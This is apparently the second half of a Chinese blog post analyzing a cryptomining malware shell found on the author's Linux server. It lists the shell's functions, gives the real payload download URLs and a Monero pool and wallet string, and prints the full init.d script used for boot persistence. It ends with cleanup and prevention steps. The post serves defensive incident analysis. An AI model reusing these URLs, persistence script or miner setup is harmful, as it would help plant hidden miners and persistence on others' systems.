- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
这个shell和之前那个shell很相似很多方法重复了,但是也有一些变化,同样先看看他的方法
downloadrun
http://thyrsi.com/t6/358/1534495127x-1404764247.jpg的内容保存到/tmp/kworkerds并赋权限然后后台执行 /tmp/kworkerds
downloadrunxm
把http://thyrsi.com/t6/358/1534496022x-1404764583.jpg的内容保存到/bin/config.json并赋权限,这是一个json 同时把http://thyrsi.com/t6/358/1534491798x-1404764420.jpg的内容保存到/bin/kworkerds并赋权限,然后后台执行 /tmp/kworkerds
echocron
到处写定时任务
init
这个方法之前没有,把http://thyrsi.com/t6/362/1535175015x-1404817880.jpg的内容保存到/usr/sbin/kworker并赋权限,这也是一个可执行文件,把http://thyrsi.com/t6/362/1535175343x-1566657675.jpg的内容保存到/etc/init.d/kworker并赋权限,这也是一个shell脚本是kworker的脚本chkconfig --add kworker添加开机自启
#! /bin/bash #chkconfig: - 99 01 #description: kworker daemon #processname: /usr/sbin/kworker ### BEGIN INIT INFO # Provides: /user/sbin/kworker # Required-Start: # Required-Stop: # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: kworker deamon # Description: kworker deamon ### END INIT INFO LocalPath="/usr/sbin/kworker" name='kworker' pid_file="/var/run/$name.pid" stdout_log="/var/log/$name.log" stderr_log="/var/log/$name.err" get_pid(){ cat "$pid_file" } is_running(){ [ -f "$pid_file" ] &&/usr/sbin/kworker -Pid $(get_pid) > /dev/null 2>&1 } case "$1" in start) if is_running; then echo "Already started" else echo "Starting $name" $LocalPath >>"$stdout_log" 2>> "$stderr_log" & echo $! > "$pid_file" if ! is_running; then echo "Unable to start, see$stdout_log and $stderr_log" exit 1 fi fi ;; stop) if is_running; then echo -n "Stopping$name.." kill $(get_pid) for i in {1..10} do if ! is_running; then break fi echo -n "." sleep 1 done echo if is_running; then echo "Not stopped; maystill be shutting down or shutdown may have failed" exit 1 else echo "Stopped" if [ -f "$pid_file"]; then rm "$pid_file" fi fi else echo "Not running" fi ;; restart) $0 stop if is_running; then echo "Unable to stop, will notattempt to start" exit 1 fi $0 start ;; status) if is_running; then echo "Running" else echo "Stopped" exit 1 fi ;; *) echo "Usage: $0{start|stop|restart|status}" exit 1 ;; esac exit 0
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
方法分析完了分析一下这个shell:就是downloadrun下载可执行文件/tmp/kworkerds并后台运行然后init下载并配置kworkerd开机自启之后echocron在三个地方配置定时任务sleep 10休息10sdownloadrunxm下载/bin/config.json并下载可执行文件/tmp/kworkerds后台运行
4.感想
终于分析完这个黑客程序的大致流程并把他启的各个线程干掉,下载的个个文件干掉。分析最开始中毒可能是由于安装redis的时候不小心怎么调用了这个程序,如果没有阿里云预警可能一直没有办法发现就一直被占用资源占用带宽,以后安装程序还是尽量走官方途径服务器也开启秘钥方式登录比较好,还有就是一些脚本程序后台程序如果用不到就尽量不装。总之感觉经历一次服务器被黑并深入看他的代码感觉成长还是比较大的。然后就是这里面的一些代码和shell脚本存放地址都是一些三方机构的还是没有能找到黑客自己的地址感觉也是很遗憾的可能和放在可执行文件里面或者和"url": "stratum+tcp://xmr.f2pool.com:13531","user":"47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.xmrig"有关。
5.解决方案
-
- 找到对应进程并杀掉
-
- 看看病毒脚本是不是利息了python或者其他服务器不需要的环境,删除运行环境
-
- 数据备份,换一台云主机部署,然后格式化中毒主机
-
- 实时关注一些软件bug,系统漏洞,关闭不需要使用的接口,密码负责读提高等预防中毒
-
- 安装一些linux杀毒软件
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/笔触狂放9/article/detail/831425
推荐阅读
相关标签
